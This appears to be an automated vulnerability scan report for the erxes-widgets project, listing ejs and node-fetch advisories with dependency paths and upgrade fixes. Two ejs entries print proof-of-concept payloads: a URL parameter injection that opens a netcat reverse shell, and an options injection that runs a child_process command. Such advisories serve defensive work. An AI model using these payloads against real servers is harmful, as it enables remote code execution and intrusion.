Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › ejs@2.7.4Remediation: Upgrade to ejs@3.1.7.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options parameter of renderFile, which makes it possible to inject code into outputFunctionName.
Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.
PoC:
Creation of reverse shell:
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
Remediation
Upgrade ejs to version 3.1.7 or higher.
References
medium severity
- Vulnerable module: node-fetch
- Introduced through: react@16.4.2 and react-dom@16.4.2
Detailed paths
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3Remediation: Upgrade to react@16.5.0.
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react-dom@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3Remediation: Upgrade to react-dom@16.5.0.
Overview
node-fetch is a light-weight module that brings window.fetch to node.js
Affected versions of this package are vulnerable to Information Exposure when fetching a remote url with Cookie, if it get a Location response header, it will follow that url and try to fetch that url with provided cookie. This can lead to forwarding secure headers to 3th party.
Remediation
Upgrade node-fetch to version 2.6.7, 3.1.1 or higher.
References
medium severity
- Vulnerable module: node-fetch
- Introduced through: react@16.4.2 and react-dom@16.4.2
Detailed paths
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3Remediation: Upgrade to react@16.5.0.
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react-dom@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3Remediation: Upgrade to react-dom@16.5.0.
Overview
node-fetch is a light-weight module that brings window.fetch to node.js
Affected versions of this package are vulnerable to Denial of Service. Node Fetch did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure.
Remediation
Upgrade node-fetch to version 2.6.1, 3.0.0-beta.9 or higher.
References
medium severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › ejs@2.7.4Remediation: Upgrade to ejs@3.1.6.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the render and renderFile. If external input is flowing into the options parameter, an attacker is able run arbitrary code. This include the filename, compileDebug, and client option.
POC
let ejs = require('ejs')
ejs.render('./views/test.ejs',{
filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
compileDebug: true,
message: 'test',
client: true
})
Remediation
Upgrade ejs to version 3.1.6 or higher.